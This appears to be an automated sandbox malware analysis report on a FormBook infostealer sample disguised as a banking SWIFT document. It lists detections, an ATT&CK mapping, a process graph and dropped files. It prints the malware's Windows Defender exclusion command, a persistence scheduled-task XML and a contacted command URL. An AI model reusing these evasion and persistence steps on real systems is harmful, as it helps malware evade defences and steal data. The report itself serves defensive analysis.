          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: explorer.exe, 0000001C.00000000.609009381.0000000005867000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.475690715.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.625088628.0000000003610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.412407613.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.380797387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.384803178.0000000003FCD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.624991985.00000000035E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.385092750.0000000004232000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.432842993.0000000007682000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476496897.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.381918997.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.476370956.0000000001590000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Process Injection412Masquerading1OS Credential DumpingQuery Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11LSASS MemorySecurity Software Discovery241Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion41Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection412NTDSVirtualization/Sandbox Evasion41Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 528767 Sample: HSBC_SWIFT-20-11-2021.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Yara detected AntiVM3 2->48 50 6 other signatures 2->50 10 HSBC_SWIFT-20-11-2021.exe 7 2->10         started        process3 file4 40 C:\Users\user\AppData\...\RdffGefdbLSx.exe, PE32 10->40 dropped 42 C:\Users\user\AppData\Local\...\tmp4EB8.tmp, XML 10->42 dropped 52 Uses schtasks.exe or at.exe to add and modify task schedules 10->52 54 Adds a directory exclusion to Windows Defender 10->54 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 HSBC_SWIFT-20-11-2021.exe 10->14         started        17 powershell.exe 25 10->17         started        19 powershell.exe 24 10->19         started        21 schtasks.exe 1 10->21         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 23 explorer.exe 14->23 injected 25 conhost.exe 17->25         started        27 conhost.exe 19->27         started        29 conhost.exe 21->29         started        process8 process9 31 msdt.exe 23->31         started        signatures10 66 Self deletion via cmd delete 31->66 68 Modifies the context of a thread in another process (thread injection) 31->68 70 Maps a DLL or memory area into another process 31->70 72 Tries to detect virtualization through RDTSC time measurements 31->72 34 cmd.exe 31->34         started        36 explorer.exe 31->36         started        process11 process12 38 conhost.exe 34->38         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.HSBC_SWIFT-20-11-2021.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.HSBC_SWIFT-20-11-2021.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.164661.com/ntfs/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          www.164661.com/ntfs/true
          • Avira URL Cloud: safe
          		low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000A.00000000.405790270.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.423799260.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.385812561.000000000095C000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.455497902.000000000095C000.00000004.00000020.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmpfalse
              		high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:528767
              Start date:25.11.2021
              Start time:18:47:51
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 12m 42s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:HSBC_SWIFT-20-11-2021.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:34
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@17/12@0/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 20% (good quality ratio 18.2%)
              • Quality average: 73.8%
              • Quality standard deviation: 31%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 125
              • Number of non-executed functions: 160
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, mobsync.exe, wuapihost.exe
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtEnumerateValueKey calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              18:48:50API Interceptor80x Sleep call for process: HSBC_SWIFT-20-11-2021.exe modified
              18:48:57API Interceptor72x Sleep call for process: powershell.exe modified
              18:50:16API Interceptor140x Sleep call for process: explorer.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HSBC_SWIFT-20-11-2021.exe.log
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):2239
              Entropy (8bit):5.354287817410997
              Encrypted:false
              SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
              MD5:913D1EEA179415C6D08FB255AE42B99D
              SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
              SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
              SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
              Malicious:false
              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
              C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
              Process:C:\Windows\explorer.exe
              File Type:data
              Category:modified
              Size (bytes):29232
              Entropy (8bit):1.7174925014010742
              Encrypted:false
              SSDEEP:96:4Xn/EwkcovPYCckGbZQYNAY+DcExux/H2ZPzgf:0kbvrc3N3LEy/z
              MD5:9CEA85F54A98B49F9713D46001D44B3F
              SHA1:655BFE94A738ADF4510A0F07DBB76AC343E09A22
              SHA-256:B365CE9FE495AF8D436049A93F34CA1A8363439C0D8EB45EB46921519A4A0458
              SHA-512:4E30DAC95FDC5601121BBD5A02E2DCA67852E36700E56A972EBDF14872AA41B0E23BFBB96198B7C2A04D5E2275509599EB57E148716C9C57F9101A58C50E5321
              Malicious:false
              Preview: ..0 IMMM ...............................................................................z...........4...............................................................................................................................................................................................QR.....................................................................D... ............T..................................................z.....Q. ...............................................................R..T.g.5 ...............................................................:..e.;6. ............j..................................................b...;K..0........................................................................................................................................+${..a?0................o......................................................................................................................................................................................
              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):22276
              Entropy (8bit):5.603205624926295
              Encrypted:false
              SSDEEP:384:utCDLj1Bi1EIUkl+RMSBKnwjultI+77Y9gtSJ3xeT1MaXZlbAV7EvDWhmRZBDI+W:n41E3k14KwClthftc8C+fwAvfVM
              MD5:8022AC6DB8E130F172B0B1DFD81A75BD
              SHA1:8A5CF5649B9ABDCB791D0E79EE914A25A41E458E
              SHA-256:697F49E4F30B68C3B95A7B87338203A034077667D314430DEDCF9A95B74BD80D
              SHA-512:22AFC211C14434E845E5CF81AB29583604A511C1BDE49866B37A1F57FC9DAE9A84A67397D846B2268F0FC6E9D88EEF5931FE4200F62BA72828B3E72ED2E981D5
              Malicious:false
              Preview: @...e...........y.......h.\...........B...F..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04xvx3ge.imm.psm1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5azzze0s.akj.ps1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpdt4pua.1fr.ps1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt4teizv.av4.psm1
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Preview: 1
              C:\Users\user\AppData\Local\Temp\tmp4EB8.tmp
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1611
              Entropy (8bit):5.116240184745884
              Encrypted:false
              SSDEEP:24:2di4+S2qh/S1K2ky1mo2dUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLk+xvn:cgea6YrFdOFzOzN33ODOiDdKrsuTgyv
              MD5:774E84F6AC7E66BE600BBDC7957155AC
              SHA1:1A752B132A55F7BB5287A10AAE4F104E825845F3
              SHA-256:72AAD5A5B5425BA55BAB6210181C959F71F5D9B5C205A74398D369A3D2CF8BDB
              SHA-512:6F82A8DF85B62DA11D3E26DF1BE3AE49B9E4B41FFEA11C1D6229C47D62D3D9815289CCDC02643AD75446468F9BC1E4729A6AC6A21A94730FFE61CBC4208609A7
              Malicious:true
              Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailab
              C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):438272
              Entropy (8bit):7.8432109795537235
              Encrypted:false
              SSDEEP:12288:lH41U0XdLgxmfz9aWuIazPy03IYwr3EQZpdoyWQHzKQMixBFm:lHYU0uEr9aWTyNBwjppd1WQTAi1
              MD5:3E9BDDCD8EDE94BEB73D43D4D3446FE7
              SHA1:27723F2FB360A300DF95C22FD1D8353A5D940455
              SHA-256:4518C17E858EAAE9A38CDF5953BD7D0CAD3C3FD5FA2B9A5B84E0CAD5E8ECFC5E
              SHA-512:81FFD8D361C6809E41819F9074E7EE84E8E8ED4BD744D8C87270E26CA405BF613EA9C29247C71ED50E057B5F39BB05CBBACD78433A37426BA02EFA7063366DAB
              Malicious:true
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5G.a..............0.............j.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................L.......H........e..Xv............................................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....
              C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe:Zone.Identifier
              Process:C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:false
              Preview: [ZoneTransfer]....ZoneId=0
              C:\Users\user\Documents\20211125\PowerShell_transcript.921702.IDbll8EJ.20211125184857.txt
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):5827
              Entropy (8bit):5.374058040185106
              Encrypted:false
              SSDEEP:96:BZhTLVNgtqDo1ZmZ1TLVNgtqDo1ZPT57jZgTLVNgtqDo1Z+KrrnZo:ubjI
              MD5:05DB53C96F655EBF6EF4CAE8E1DBEFC3
              SHA1:B72A74AE311C15631AB3AAB1E0234BE99589ACEB
              SHA-256:A56C0763BF6000D191FC20B20569FA5C41FCA4F18B22CC1BC5A6F70C7BA94965
              SHA-512:D271C3801CF15FC23B4756C2484F1D2AA692E7B82496A3FE5858F8DA58686E79F732C4E94AB6B9B042F9101C1D404D1A9B63F8557326FBDDFA84DA59382D7944
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20211125184859..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 921702 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe..Process ID: 5576..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211125184859..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe..**********************..Windows PowerShell transcript start..Start time: 20211125185229..Username: computer\user..RunAs User: D
              C:\Users\user\Documents\20211125\PowerShell_transcript.921702.K2IUYCHw.20211125184856.txt
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):5831
              Entropy (8bit):5.396138733203896
              Encrypted:false
              SSDEEP:96:BZjTLVNGyqDo1ZCkZCTLVNGyqDo1ZmecWjZxTLVNGyqDo1ZDDGGuZB:X
              MD5:FE22AF4958E2ED64F3F431ECC096159B
              SHA1:A2FC81D82CBCC50F8917A6A7ED8AF55E881FF7C1
              SHA-256:32B36EC0073F167F8E8415BC0E858272709C6F3D9ACECF8E71E1EB6730A9CF1B
              SHA-512:6E52400245BD4F75AEA9E916E5937ACE0E70AA8C717AFED07EA7049A36394234704D20BCE7102389327F707153FE96A816BBE0A04BA3070032305A150DE1D7E4
              Malicious:false
